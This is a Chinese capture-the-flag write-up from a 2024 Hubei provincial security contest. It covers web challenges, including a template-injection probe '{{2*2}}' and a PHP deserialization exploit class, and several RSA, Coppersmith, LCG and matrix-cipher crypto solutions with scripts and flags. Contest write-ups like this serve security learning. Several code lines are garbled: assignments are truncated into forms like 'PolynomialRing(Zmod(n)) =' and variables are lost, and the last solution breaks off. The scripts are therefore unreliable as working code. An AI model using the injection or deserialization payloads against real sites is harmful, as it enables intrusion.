本文来自:天权信安网络安全生态圈
作者:天权信安网络安全团队
2024年湖北省网络与数据安全实践能力竞赛
——天权信安WriteUp
✦✦✦
解题过程
WEB.01
✦✦✦ 1.速算比赛
直接禁用JS 手动计算30次得到flag
操作内容:
WEB.02
✦✦✦ 2.Sal的图集
操作内容:
回显是4,Search处有ssti漏洞
代码:
/search?name={{2*2}}
WEB.03
✦✦✦ 3.popmart
操作内容:
代码:
class popmart{
public $yuki;
public $molly;
public $dimoo;
public function __construct(){
$this->yuki='tell me where';
$this->molly='dont_tell_you';
$this->dimoo="you_can_guess";
}
public function __wakeup(){
global $flag;
global $where_you_go;
$this->yuki=$where_you_go;
if($this->molly === $this->yuki){
echo $flag;
}
}
}
$exploit = new popmart();
$serialized_exploit = serialize($exploit);
echo $serialized_exploit;
CRYPTO.01
✦✦✦4 Mypow
操作内容:
参考链接:
https://blog.csdn.net/luochen2436/article/details/132138412
代码:
题目:
+from Crypto.Util.number import *
from gmpy2 import *
import os
flag = b'xxx'
def Mypow(b, e, mod):
a = 1
while e:
e >>= 1
b = (b*b)%mod
if e&1:
a = (a*b)%mod
return a
def Genp(bit_length):
coeff = 2 ** 5 * 3 * 7
while True:
tmp_prime = getRandomNBitInteger(bit_length - 10)
p = coeff * tmp_prime + 1
if is_prime(p):
break
return p
def Genkeys(bit_length):
p,q = Genp(bit_length),Genp(bit_length)
n = p * q
hint = (2 * p + 7 * q) % n
return n, hint
if __name__ == '__main__':
e = next_prime(666)
n, hint = Genkeys(512)
m = bytes_to_long(os.urandom(30) + flag)
ct = Mypow(m,e,n)
print(f'n = {n}')
print(f'hint = {hint}')
print(f'ct = {ct}')
'''
n = 36443283250594259606482132779262570582448178589602577809591307671554949253094255209079689901493052116793388954529442162972106210862341856282788030374324677114528044629385805693771773377070021111949953333360526159026822968061585876873187059674130307295006486032106471182393880915860569773206853864515489855553
hint = 57792516722001523643789088224096258172899052039145876393373730235406451592173971020702024058282699663364267742428240581839287357212741266617791207580236457
ct = 24482128269957355675512496312977308128712253968496848873519792376434347925427116612997489113223781321628516365811583310346553402215907938918891908853234881284620764982626375301219763593402089309909155204943747718536894186749932544428588048770663458669109073657836937287831725958017345747881678942488157429000
'''
#sage
R.<x> = Zmod()[]
f = 2*x^2 + 7*n - hint*x
p = int(f.roots()[0][0])
q = n//p
Mypow(b,e,mod)函数相当于pow(m,e,n)函数,但是对于不同的幂e结果不同。当e为偶数时,相当于pow(m,e,n);当e为奇数时,相当于pow(m,e-1,n)。本题的e = next_prime(666),显然是一个素数(必然是奇数),因此真正的e = next_prime(666)-1。
经计算,gcd(e,phi)=e,因此演变为有限域下开根问题。分别在 G F ( p ) , G F ( q ) GF(p),GF(q) GF(p),GF(q)上开e次方根,之后crt组合一下,求出所有的m,再判断字符串中是否含有DASCTF即可得到flag。
#sage
import gmpy2
from Crypto.Util.number import *
n = 36443283250594259606482132779262570582448178589602577809591307671554949253094255209079689901493052116793388954529442162972106210862341856282788030374324677114528044629385805693771773377070021111949953333360526159026822968061585876873187059674130307295006486032106471182393880915860569773206853864515489855553
hint = 57792516722001523643789088224096258172899052039145876393373730235406451592173971020702024058282699663364267742428240581839287357212741266617791207580236457
ct = 24482128269957355675512496312977308128712253968496848873519792376434347925427116612997489113223781321628516365811583310346553402215907938918891908853234881284620764982626375301219763593402089309909155204943747718536894186749932544428588048770663458669109073657836937287831725958017345747881678942488157429000
R.<x> = Zmod()[]
f = 2*x^2 + 7*n - hint*x
p = int(f.roots()[0][0])
q = n//p
e = gmpy2.next_prime(666)-1
R.<x> = Zmod(p)[]
f = x^e-ct
f = f.monic()
results1 = f.roots()
R.<x> = Zmod(q)[]
f = x^e-ct
f = f.monic()
results2 = f.roots()
for i in results1:
for j in results2:
param1 = [int(i[0]),int(j[0])]
param2 = [p,q]
m = CRT_list(param1,param2)
flag = long_to_bytes(int(m))
if b'DASCTF' in flag:
print(flag)
break
flag值:
DASCTF{FastP0w3r_4nd_AMM_0f_R5A}
CRYPTO.02
✦✦✦5 easycrypto
操作内容:
参考链接:
https://blog.csdn.net/luochen2436/article/details/132964576
题目:
代码:
题目:
from Crypto.Util.number import *
from secret import FLAG
m = bytes_to_long(FLAG)
def getpq(nbit):
p = getPrime(nbit)
q = getPrime(nbit)
if p > q:
return p, q
else:
return q, p
q = getpq(512)
P = (p - q) & ((1 << 130) - 1)
n = p * q
leak_p = p >> 256
c = pow((1 + P * n), m, n ** 3)
', n) =
', leak_p) =
", c) =
# n = 135133139540786818977969958456509467902948924003478556140490841984247464940261764739984274397650928404945721248284577232814352745333641188749824519153271662051302477973525156608141358709265683759057060630360909926255299541198485901065352661702656282587105799982740927802530997159098015074633017964344230291287
# leak_p = 115314121469787984258489158421056136177545051135641551928888818017665807264468
# c = 1836794759996264077871820946090708779709415760553736759453665641907562256633157424959089180650539327925671892742819931875681606982615287882656254828326465758462357812873839261469783652663796071814218493268788421243190729887313099383264588659922912876424206670310928514588754069909128149471326084547056385690037197908766053620702238356084124023146075698878494434053246157524775269473152458661801907641122308756667762880284617915774590075511686821816948174618196839335059944389423693187930672934293905608970421003536691336581450927887931599275461176935079227494931457562345640133982771901848553204154760760399724074615092290799119053032875792219794072963200108352944441876206386518960615891547166767499506114294860833404421893612197040731184031783165365621722947731966143226777081983415797778111715332055871302609049501876860012070502369090417942239749695034267695710324328867728296996779
p高位泄露256bit,但是泄露的bit不够,我们还需要爆破8bit才能copper恢复p。
#sage
from tqdm import *
n = 135133139540786818977969958456509467902948924003478556140490841984247464940261764739984274397650928404945721248284577232814352745333641188749824519153271662051302477973525156608141358709265683759057060630360909926255299541198485901065352661702656282587105799982740927802530997159098015074633017964344230291287
p_high = 115314121469787984258489158421056136177545051135641551928888818017665807264468
c = 1836794759996264077871820946090708779709415760553736759453665641907562256633157424959089180650539327925671892742819931875681606982615287882656254828326465758462357812873839261469783652663796071814218493268788421243190729887313099383264588659922912876424206670310928514588754069909128149471326084547056385690037197908766053620702238356084124023146075698878494434053246157524775269473152458661801907641122308756667762880284617915774590075511686821816948174618196839335059944389423693187930672934293905608970421003536691336581450927887931599275461176935079227494931457562345640133982771901848553204154760760399724074615092290799119053032875792219794072963200108352944441876206386518960615891547166767499506114294860833404421893612197040731184031783165365621722947731966143226777081983415797778111715332055871302609049501876860012070502369090417942239749695034267695710324328867728296996779
pbits=512
for i in trange(2**8,1,-1):
p4 = p_high<<8
p4 = p4 + i
kbits = pbits - p4.nbits()
p4 = p4 << kbits
PolynomialRing(Zmod(n)) =
f = x + p4
roots = f.small_roots(X=2^kbits, beta=0.4, epsilon=0.01)
if roots:
p = p4+int(roots[0])
if n%p==0:
print(i,p)
break
#i = 197,p = 13352463043552409670211183534740157814546713901105410408023687926498813469217507846107364405269402732967687839808637375591530105677153038557366731161035343
计算得到P,接着二项式展开得到
解题代码:
import gmpy2
from Crypto.Util.number import *
n = 135133139540786818977969958456509467902948924003478556140490841984247464940261764739984274397650928404945721248284577232814352745333641188749824519153271662051302477973525156608141358709265683759057060630360909926255299541198485901065352661702656282587105799982740927802530997159098015074633017964344230291287
c = 1836794759996264077871820946090708779709415760553736759453665641907562256633157424959089180650539327925671892742819931875681606982615287882656254828326465758462357812873839261469783652663796071814218493268788421243190729887313099383264588659922912876424206670310928514588754069909128149471326084547056385690037197908766053620702238356084124023146075698878494434053246157524775269473152458661801907641122308756667762880284617915774590075511686821816948174618196839335059944389423693187930672934293905608970421003536691336581450927887931599275461176935079227494931457562345640133982771901848553204154760760399724074615092290799119053032875792219794072963200108352944441876206386518960615891547166767499506114294860833404421893612197040731184031783165365621722947731966143226777081983415797778111715332055871302609049501876860012070502369090417942239749695034267695710324328867728296996779
p = 13352463043552409670211183534740157814546713901105410408023687926498813469217507846107364405269402732967687839808637375591530105677153038557366731161035343
q = n//p
P = (p - q) & ((1 << 130) - 1)
m = (c-1)//n*gmpy2.invert(P,n) % n
flag = long_to_bytes(m)
print(flag)
#DASCTF{365d0d2cda3a3836a19bf1f46760d875}
flag值:
DASCTF{365d0d2cda3a3836a19bf1f46760d875}
CRYPTO.03
✦✦✦
6 Another+leak+of+LCG
操作内容:此题为原题,找到了代码,发现代码跑不通,更改了一下代码,跑出结果。
种子恢复逻辑:从最后一轮开始,逐步逆推种子。每轮只使用非 * 的有效位,按低位在前构建整数。利用线性同余公式 (seed - b) * inverse(a, M) % M 逆推种子。
恢复 Flag:通过异或运算 flag = c ^ seed 恢复原始 flag,其中 c 是给定的密文。
解码 Flag:尝试不同编码(如 utf-8, latin1),检查是否全是ASCII字符,记录最佳解码结果。
解题公式
种子逆推公式:seed = (seed - b) * inverse(a, M) % M
Flag 恢复公式:flag = c ^ seed
代码:
from Crypto.Util.number import long_to_bytes
c = 16881580266371213879199933551551391657843465997606963348664525781336437594162520786815349648165563542125219063481822246500499434326624995868766335675376062002958905249433093212
a = 7048435472566573813031570507837890091364947084306630050544242220147807292350445564322172244244726206563452305566866223414437853917448623276909090327076693
b = 9204853069421046007176344891235245198607052139715825810823076231566533652655127030214860066312526149219510111657539481375881111759200483396551737326166933
x = ['**********************1*****************************************************************************0******************************************************************************************************************1*************************************************************************************1*********************************************0*********************************************************************************************************************************************************1**********', '**1**************************0*********************1************************************************************************************0**********************************************************************************************************************************1******************************0********************************0********************************1*****************************************************************************************************************************************0*********', '*************************************************************************************1*********************************1*********************************************************************1**********************************************************************************************************************************************************************0*******************************************************************************1******************************************1********************************', '**************************0**************************************************1***********************0******************************************************1*********************************************************************************************************************0*************************1***********************************************************1******************************************************************1*************0*****************************************************************1****', '******0******************************************************1*************0******************************1****1*********************************************1*******************************************************0*********************************************************************************1*****************************************0******************************************************1**********************************************************************1************************************************', '***********************************0******************1**********0*****************************************************************************************************************************************************0*******************************1************************************************************1**************0*************************************1**************************1***************************************************************************************0***********************************', '********************************00************************************************************************00************************************************************************************************************0*******************************0*0********1***********1*1***********1****0***********************************************************************************************************0*********************************************************************0******************************************0', '***************************0******************************************1****************0*************************1**********************0************************************************************************0*************************0***************0****************************0*******1***************1******************0*******************1**********************************************************************************************************************************************0****************0********', '**0********************************************************************************1************************1*************************************************************************1*************************1*************************1***************1*****************************************************************************************************************0**********************************01**************1********************************************************************************************0***', '**1*******************************************************************************1*********************************1******0*****************************************************************************************************1*********************************************************************************************1***************1********************************1*************************************0**0******************************************************************************************************', '********************************************************************************************************************************************************0********************************************0***0*************************************************************0*******1***********************0****************************1*********************************************************************************************0**********************************************0*******1**********************************0***', '***************************************************************************************************************************0**********************1*********0*********************************************************************************1*******0**********************************************************0*************************************************************************************************1************************************************************************************************************', '******************************************************************************************************0************1**0******************************1******************************************1****************************1******0*****************************************************************************************************************************************************0*******************0*********************0*******************************************************************************************', '****1************1***********************************************************************************************************1*****************************************************1***************************************************1**********************************************************************************************************************0*******************************0*****************0*************************1********************************************0*********0**0***1***********************', '******0************************************************************************0***************************************************************************************************************************************************************1**************************************************************************************************************************************************************1********************1********1**************************************************0******************0*************', '**********1********************************1*****************************************************************0*****************************************************************************************************************************************1***1***************0*******************1******************************************************************0****************************************01*****************************************************************************************************************0*', '**********1**************************************************************************************************************************************************************************************************************************************************************************************1******************0******************************************************************************************************************************************************************1****************************************', '**************************************************************************************************************************************0************************************************************0***************************************************************************************************************************************************************************************************0***********0**************************************************************0***************1*****************************', '*******************************************************0*********************************************************************************************************************************1****1****************************************************************0*******0*****************************************************************************************************************0***************0*******************************************************************************0**************************************', '*******11***********1*************************1****************************************************************************************************************************************************************************1******************0******************0************************************************************************************************0*****************1*****************************************************************************************************************************************0*', '******************************************************************1****************************************************************************************************0**************************************************1********************************************************************************************************************************************************************************************************************************************************0*******1***************************1********', '*******************0**************************************************0****************************************************1*************************************1*********************************************************************************************************************************************************0***************0*******0***************************************************0*******************************************************************************************************1**0*************', '********************1**********1*******************************0*********************11*************************************************************0*************************************************************************0******************************************************************0**********************************************************************************1***************0**1*****************1*********************************************************0********************************************', '*************************0********************************************************************************************************0**************01************0************************************************1*****************0**************0*********************1*********0************0*****************************************1***1**************************************************************************0**********************************************1************1********************************************', '*****************************************************************************1***************1*****1***********************************************************************************************************************0****************************************************************************************************1*************************0****************1*************************************************************************0**************************************************************************', '***************1**********1**********************************************************0***************************************************************************************************************0**************0**********1*******************************1*****************************************************************************************0**********************************************************************************************0******************************************************************0****', '***1*****************************************************************************************************0***************************************************************************************************************1**************************************************0***************0********************************************************1*******************************************1*****************************************************************************************************************0************', '*********************************************0*1***************************************************0****************************************************************************************************1********************************************************************************************************0*******************************0**************************************************0**********0***********1********************************************************************1**********************0***0***1', '************10*******************************************0**********************************1************************0****************************0*************************************************************************************************1***************************0****0*1**********************************************1******0*************************************************1********************************************************************************************************************************', '**************************************1*************0**************1*************1*****************0**********1****************************************************************************************************************************************************************************************************************************************************0********************1*******************0************************************************1***************1**************************************************', '**************************************************************************************************************1****************0*************************1****0******************************************0****************************************************************0***********************************************************************0*************************************************0**********************0**********************************************0**1**************************************************', '******************************************0************************************************************00***********************************************************************************************************************************1*************************************************************************************************************************************************************1***********************1**************************0******************************************************************', '******************************************************************************************************1*1***********0*************************************************************0********************************************************************************1*********************************0*******1********************************************************************************************1*****************************1*************************1*************************************1***********************', '**************0******0*************1*********0************************************1******************0**1****************************************************************************************************************************0*************1****************************1****************************************1***********************0*****************************************************************************0********0*1******************1**********************1*******************************************', '***************************1***************************************************************************************************1**********************************1******************************************1********************************************************************************************************************0*********11*****************************************************************************************************************************************************1****************************', '***********************************************************************************************************1*******************************1***********************1*****1**************************************************************************************************1**************0*******1*************************************1**********************************************************************************************************************************************1********************************1******', '***************************************************************0**0************************************0********************************************************************************************************0**************************1*********************************************1************************************************************************1***0*************************************************1************************************************1********1***************0********************1********', '*****************************************0**0******************0***************************************************************1*********1**1***************************************************1***********************************************0***************************0**********1********1*****************0*************************************************0***********************0**********************************1******************************************************************10****************************', '********************************************************************************************************************************************************************1****************************************************1****************************************************************************0***************************************************************************************************************************************0**********************************************************0**********************', '**********************************0**************************************************0*************************************0**********************************0**********************************************************************************0*****0***********************************************************0*************************************0***************************0******************************1*0*********************************************************************************************************', '**************************************************************************************************************1***0*********************0***************************0**************************1*****************1****************************************************************************************************************************************************************************************************************0************************0********************************************************************', '*****************************************************************1************************************0*****************************0*******************************************************0********************0*********************************************0***********************0*****0****************************************************************************0**********************0**1***************************************************************************************************************************', '**********************************************************1*****************1**************************************************************0****************************************************************1**************************************************************************************************************************************0*********************************************************************************************1******************************************************************************', '***************0***************************************************************************0************1***************1**************************************1************1**************************************************************************************************0*************************************************************************************************************************************1************************************************0*********************************************************', '*******************************************************************************************************************10**********************************************************************************************************************************1*******************0**********0**********1*****************************************************0******************************************************************************1***0*****************************************************************1*******************', '******************************00***********0**************************************************0***************************************************************************0************0*****************0****************************0******************************************************************************************************************************************************************************1***************0*****************************0******************0*****************************************', '*********************0*****************************************0*********************1****************1***************************10*************************1**********0***************************************************************************************************************************************************************1************0********************************************0*****************************************************************************************************************************', '***************************************************1*01*********************1***************************************1************************1*******0******************************************1*******************************************************************************0********************1**0*****0******************************************************************************************0*1********************************************************************************************************************', '***************************1*******************1*****************************************************************************************0*****************************************************************************************************************************0*****************************0*********************1*****1*************************0***************1******************1***********************************************************0******************************************0*1************************', '****************************1******************************************************************************0****************0**********************************************************************************************0**************************************************1********************************************************************************************************1***********************0***************************1*********************************0****************************0*********************', '*********************************************************1***************************************0**********************************************************0***************************1*******************************************************0*********************************************************************************************************************1***************************0****************************0*1**************0***************************0***************************************************', '**************************0******11*******************************************************************************0**********************************************************0****************************1**********0**********************************************************************************************************************************************************************************************************************************************************************************************************', '*******************1*****************************************************************************************************************************************************************************************0************************************************************************************1**********************************************************0*************0***************************************************************************************************1************************************************', '***************1***********************************0*********1********************0***********************1*************************************1*********************************************************************0***********************************************************************************************************************************************************************************************************************0***********************************************0*********************************', '****************************1**************************************************************************************************************************1*****0***************************************************************0**************************0*1************0****************************************0***********************************0*****************************************************************************************************************************************************0*********************', '*********************************************************************************************************0*********************************0*********************************1************00***0*******************************************************************************************1***************************************************************0************************************************************************************************1********************************11*******************************0*', '**1*******1************************************************************0*************************************************************************0*****************************************************0***************************************************************************************************************************************0***************************************************1***************************************************************0************************0***********************************', '***********************************************************************************************************************0*******************************************1*************************************1**************************************************************************************************************************0*******************************10*****************************************************************************1**********************************************0*****************************', '******************************************************************00*****************************************************************************************************************************************1****************************************************************************************************1***0******************************************0*************0*************************************************0*******0*****************************************************************1********************', '***************************************************************************************0**********1***1****0*****0*****************0********************************************************************************************************************************************************1***********0*****1***********1*****************************************************************************************************0*1*************************************0*******************************************************', '****************************************************************************************1***********************0********1*************1****************************************************************************************************************************************************************************************1***0*******1***************************0**********************0****************1************************************************************************************************************1**', '*********************************************************************************************************************0**************1******************************************************************************1********0****0********************************************1*******************************0******************1***************************************1*********************************************************0**********************************************************************1*********************', '********************0*************1*********************************************0*****************************************************************************************************************************************************1**********0**************************1******************************************************************1********************************************1*******************************************0****************************************************************************0**********', '*************************************************************************1***********************************************************0*************************************************************************1********************************0*************0*******************************************************************1**********************************************************************1********0*************************************************************************************************************']
T = 64
def gen(s, M):
xx = []
for _ in range(T):
s = (a * s + b) % 2**M
xx.append(bin(s)[2:].zfill(512))
return xx
XX = []
def check_seed(s, length, comparison_list):
seed = int(s, 2)
X = gen(seed, length)
for i in range(length):
for j in range(T):
if comparison_list[j][-i-1] != "*" and comparison_list[j][-i-1] != X[j][-i-1]:
return False
return True
def find_possible_seeds(prefix=""):
if len(prefix) == 512:
if check_seed(prefix, len(prefix), x):
XX.append(int(prefix, 2))
else:
for bit in ('0', '1'):
new_prefix = bit + prefix
if check_seed(new_prefix, len(new_prefix), x):
find_possible_seeds(new_prefix)
XX = [] # 存储找到的有效种子
find_possible_seeds()
print(XX)
for SEED in XX:
print(long_to_bytes(c ^ SEED))
CRYPTO.04
✦✦✦ 7 QAQTAT
操作内容:
参考链接:
https://dexterjie.github.io/2024/12/01/%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/2024%E7%AC%AC%E4%BA%8C%E5%B1%8A%E7%A6%8F%E5%BB%BA%E7%9C%81%E6%95%B0%E6%8D%AE%E5%AE%89%E5%85%A8%E5%A4%A7%E8%B5%9B/#QAQTAT%E2%80%94%E2%80%94Unsolved
代码:
from Crypto.Util.number import *
from hashlib import sha256
from secret import flag
m = bytes_to_long(flag)
def enc(pt, G, A, T, S, p):
s = randint(0,p-1)
D = G^s
E = A*T*A
F = D*E*D
K = list(D*S*D)
key = sum(K[0])+sum(K[1])+sum(K[2])
mask = int(sha256(str(key).encode()).hexdigest(),16)
ct = pt ^^ mask
return ct, F
def dec(ct, Q, F, p):
K = Q*F*Q
key = sum(K[0])+sum(K[1])+sum(K[2])
mask = int(sha256(str(key).encode()).hexdigest(),16)
pt = ct ^^ mask
return pt
p = getPrime(256)
GF(p^2, modulus=x^2+1) =
M = MatrixSpace(Fp2, 3, 3)
while True:
Q = M.random_element()
A = M.random_element()
if Q*A != A*Q:
break
T = Q*A*Q
S = T*A*T
r1 = randint(0,p-1)
G = Q^r1
pk = (list(A), list(T), list(S), list(G))
F = enc(m, G, A, T, S, p)
",p) =
", pk) =
", list(F)) =
", ct) =
"""
p = 72887242108660141996862343556330151015969690949835567252527194788428065480383
pk = ([(17721183402259872020800275954210023274983052570120081248291897425608931477093*i + 32398110280895896734010284949974832063887503132353681078977206899204202173789, 54531634495057046991515273558305428867102201405617856305008554208336946545276*i + 53559176432820530464958340934397135653021175198597495321065224929188410347695, 27719945502856754481236098196014205483081586087367078493933408080194499938927*i + 1450628736387393873166171805424299538505476789523674611289973478290718453200), (57242423786686483363839647362581564383925732392730073374546590355998555747077*i + 573726326354574516128249317235875704460857319673337707555095009277545125755, 33631043256657770245013631632455702904903259491780484310654749784948198388976*i + 17344746653834202604930860577508757708688427949046279718508635007113840369042, 37771390186920740637371383242878514021347606565375600086363978842439775164973*i + 60264754185911116825495147907207494752330900415794996812483089251259003404228), (1163730453993018743008743150834548760986076138562570206571825145859591284352*i + 69245390362211526197537288211735612650619880945856387683074182933575799994162, 11137807706588795799057940108843238078078690609437386007163034291855328303661*i + 50795522649623533714787572047531722836395032085224035511036953078383612475598, 14354786571703727534706086386589187674076604263117377684131521866407943036307*i + 63028649680815097939155846824928638616844025040257105384123424769274942520895)], [(22137116252880790433838296157765927318220905592359967466680754349755815464341*i + 35503968364379821899511866562472775961434113516937033217642581531414863539290, 38346074307552448152239080224505166810289185210503265380269711384969731945517*i + 9333819647786551924409858116441570177115099865486742684028611902450000042407, 24608192510515673607042276468532809071945836783394960695059783085937608049755*i + 27099766371861599260580052331632986107092105438254563604629919595057370886149), (57539731529782952718529369617033412770127782205874818027724894673104814770991*i + 12431864123786174601413168140961685219607645783666490625760143190724674574386, 33510082449726132893492104159133966168598115972734064630878005553829725389082*i + 30594711977745700371548334707069524826346332947574826081979927125841475148328, 8911862104171403632946802970568635607253840071000107875759139060453368618583*i + 51594672749496705581452789883241278156858476777167382827032876227546058970732), (58105830161247358431125768499050987088161417325586965601350797391396603985470*i + 10949064084676782939947256128733523229613253182051362970560478801614590446300, 6665352489343222248969975791152178151760060704226637217535985452272551528693*i + 16163109497937280055564868323730465088174193174761590036929535644203224067166, 26147088265849488467397913386934580340556987670869413865359802108333761377560*i + 14170094609019059182842713618319151553137248441974849089555832123638494739417)], [(60066006389024369318961505483331049048095679333675437984483948643792214278503*i + 67617085525047580942273623886038114942547589259839196477555874755427651308048, 38692305959834079988532869421062338838072016075793686080934562521314366274998*i + 21104829450473981189549299039898127784065322316764325995863199136802573514, 7207625628360021282792621977024027446511231977201394776410095364976996279450*i + 23039079766688651678553952766794875180844089420934577132338235904018762773928), (10808368042897084491009063074724200907600038030639153659288985642861405920614*i + 33955795465220353002933680692690511153845418737513482128237117905262919879043, 21645210772494061734726430463955231707074915293749580279327741388687068110310*i + 62225984739450865202997071369617271241348810092608626482294704825641320606694, 14572118842071162051223076904993643512402905544627821044103215186921277812496*i + 63504547636870837320642724540312613748726280369811190421219651308407770510674), (6529211642735966744323364626486352288002532267939478445216264742350974653419*i + 43426895500365913698127867498420593427453574994051597107529725996420257433857, 66636149494607064863031794353485502915121295051850619450321561966293398587284*i + 51049172134567530748763269555600518661288880531459625871071308764595168859033, 42297258788816007263333796194491196601979606573843177791726417124128570106777*i + 45527674821983322767637713856131638914194577467349514130179266972864796164733)], [(47645610858583239528541540288030905132801730740336899517917521534427703920375*i + 13272393664089987551368548207128885229248289454405159277755757369580866096516, 60503024931869977830369448001966194434192750710631225090391559259672930497207*i + 22742672333325631628906219543935772962495637869131049729874762344108069789046, 18239371575343144081671835175136676417172797381923442300525086630600561560114*i + 53605095942301227312866863441233162082087535371838738595931070092230378325532), (49652795839344946948771531270341537200526957150620826334216871981974859849848*i + 72788891932812016325514298655742330969740202920835574638161526839627026310392, 58465406030985457122487065262985150103086610852826560192123766406670919681919*i + 41631921368744416558173670147590406285376603436284660888096365325833457519047, 2867068797023070369258694926242485369317317985428997150826022662547346928319*i + 199536555238705400453079146297641296197748614855192340202929119323998667173), (19319782936524636558881137449470396788888469756320580071801690941326971557928*i + 34694728896207512382372151140975478616355941017631874070450334268575015485538, 60420266086997924618637147844041161464210208935194926422677077391866663978425*i + 13672363312837218411993834816309940812825734002380106434784905443915361955247, 56317025568717741728727542740124505299029374963112095990350877412868385510001*i + 56960621295573230601502052571104746367180500789238336757504091383665514782189)])
F = [(36081831373398765496490121898118275331597167308301671911642273861563666664545*i + 20818485079783326431414952124332440995164298376805349071762867760925654560129, 2080527476644284459469754065728582261439110792635520661740429151724797376184*i + 22485923248080983391383279592637691489160934672854638306617785344436031827838, 15544373162545014827602222261755865080947187122261471926061663568794038512828*i + 65994932829738499994169748656063604384011854387402875895186473718226656419067), (3553534440103543686958858303956716887328727627636404431097647427819509340361*i + 41182149981825439188243414995474733005799065992663037326956422731949977723727, 11444151159046255413538671703716370245288291793592500278345001664024824339590*i + 1802783416049323926195923226865768221398255563865542946492803065162093093803, 15739175840903697568714274177182938758189586472507039731239155962622285528109*i + 38249065906628598713138583591858150126778794837077688369911160900556744463900), (14364753807737302773559096493138893453118094354943941768609481298414054855231*i + 16290236676179704559365899211744462983770375364688247022596145726641137243214, 3863306473986430132042752882629555431418515741358351198972027547882636615940*i + 1209446834271293681961506708684952401569936830292701272655835127315444154958, 21868026584808712490812183410257662299067350008298604021123682243508255905173*i + 12828201007038003022201361213007595366913298546122923089499182187938898042596)]
ct = 96910798667771988374291172958072220832574586618080134344021393928577220469428
"""
step1
from Crypto.Util.number import *
from hashlib import sha256
def enc(pt, G, A, T, S, p):
s = randint(0,p-1)
D = G^s
E = A*T*A
F = D*E*D
K = list(D*S*D)
key = sum(K[0])+sum(K[1])+sum(K[2])
mask = int(sha256(str(key).encode()).hexdigest(),16)
ct = pt ^^ mask
return ct, F
p = 72887242108660141996862343556330151015969690949835567252527194788428065480383
GF(p^2, modulus=x^2+1) =
M = MatrixSpace(Fp2, 3, 3)
pk = ([(17721183402259872020800275954210023274983052570120081248291897425608931477093*i + 32398110280895896734010284949974832063887503132353681078977206899204202173789, 54531634495057046991515273558305428867102201405617856305008554208336946545276*i + 53559176432820530464958340934397135653021175198597495321065224929188410347695, 27719945502856754481236098196014205483081586087367078493933408080194499938927*i + 1450628736387393873166171805424299538505476789523674611289973478290718453200), (57242423786686483363839647362581564383925732392730073374546590355998555747077*i + 573726326354574516128249317235875704460857319673337707555095009277545125755, 33631043256657770245013631632455702904903259491780484310654749784948198388976*i + 17344746653834202604930860577508757708688427949046279718508635007113840369042, 37771390186920740637371383242878514021347606565375600086363978842439775164973*i + 60264754185911116825495147907207494752330900415794996812483089251259003404228), (1163730453993018743008743150834548760986076138562570206571825145859591284352*i + 69245390362211526197537288211735612650619880945856387683074182933575799994162, 11137807706588795799057940108843238078078690609437386007163034291855328303661*i + 50795522649623533714787572047531722836395032085224035511036953078383612475598, 14354786571703727534706086386589187674076604263117377684131521866407943036307*i + 63028649680815097939155846824928638616844025040257105384123424769274942520895)], [(22137116252880790433838296157765927318220905592359967466680754349755815464341*i + 35503968364379821899511866562472775961434113516937033217642581531414863539290, 38346074307552448152239080224505166810289185210503265380269711384969731945517*i + 9333819647786551924409858116441570177115099865486742684028611902450000042407, 24608192510515673607042276468532809071945836783394960695059783085937608049755*i + 27099766371861599260580052331632986107092105438254563604629919595057370886149), (57539731529782952718529369617033412770127782205874818027724894673104814770991*i + 12431864123786174601413168140961685219607645783666490625760143190724674574386, 33510082449726132893492104159133966168598115972734064630878005553829725389082*i + 30594711977745700371548334707069524826346332947574826081979927125841475148328, 8911862104171403632946802970568635607253840071000107875759139060453368618583*i + 51594672749496705581452789883241278156858476777167382827032876227546058970732), (58105830161247358431125768499050987088161417325586965601350797391396603985470*i + 10949064084676782939947256128733523229613253182051362970560478801614590446300, 6665352489343222248969975791152178151760060704226637217535985452272551528693*i + 16163109497937280055564868323730465088174193174761590036929535644203224067166, 26147088265849488467397913386934580340556987670869413865359802108333761377560*i + 14170094609019059182842713618319151553137248441974849089555832123638494739417)], [(60066006389024369318961505483331049048095679333675437984483948643792214278503*i + 67617085525047580942273623886038114942547589259839196477555874755427651308048, 38692305959834079988532869421062338838072016075793686080934562521314366274998*i + 21104829450473981189549299039898127784065322316764325995863199136802573514, 7207625628360021282792621977024027446511231977201394776410095364976996279450*i + 23039079766688651678553952766794875180844089420934577132338235904018762773928), (10808368042897084491009063074724200907600038030639153659288985642861405920614*i + 33955795465220353002933680692690511153845418737513482128237117905262919879043, 21645210772494061734726430463955231707074915293749580279327741388687068110310*i + 62225984739450865202997071369617271241348810092608626482294704825641320606694, 14572118842071162051223076904993643512402905544627821044103215186921277812496*i + 63504547636870837320642724540312613748726280369811190421219651308407770510674), (6529211642735966744323364626486352288002532267939478445216264742350974653419*i + 43426895500365913698127867498420593427453574994051597107529725996420257433857, 66636149494607064863031794353485502915121295051850619450321561966293398587284*i + 51049172134567530748763269555600518661288880531459625871071308764595168859033, 42297258788816007263333796194491196601979606573843177791726417124128570106777*i + 45527674821983322767637713856131638914194577467349514130179266972864796164733)], [(47645610858583239528541540288030905132801730740336899517917521534427703920375*i + 13272393664089987551368548207128885229248289454405159277755757369580866096516, 60503024931869977830369448001966194434192750710631225090391559259672930497207*i + 22742672333325631628906219543935772962495637869131049729874762344108069789046, 18239371575343144081671835175136676417172797381923442300525086630600561560114*i + 53605095942301227312866863441233162082087535371838738595931070092230378325532), (49652795839344946948771531270341537200526957150620826334216871981974859849848*i + 72788891932812016325514298655742330969740202920835574638161526839627026310392, 58465406030985457122487065262985150103086610852826560192123766406670919681919*i + 41631921368744416558173670147590406285376603436284660888096365325833457519047, 2867068797023070369258694926242485369317317985428997150826022662547346928319*i + 199536555238705400453079146297641296197748614855192340202929119323998667173), (19319782936524636558881137449470396788888469756320580071801690941326971557928*i + 34694728896207512382372151140975478616355941017631874070450334268575015485538, 60420266086997924618637147844041161464210208935194926422677077391866663978425*i + 13672363312837218411993834816309940812825734002380106434784905443915361955247, 56317025568717741728727542740124505299029374963112095990350877412868385510001*i + 56960621295573230601502052571104746367180500789238336757504091383665514782189)])
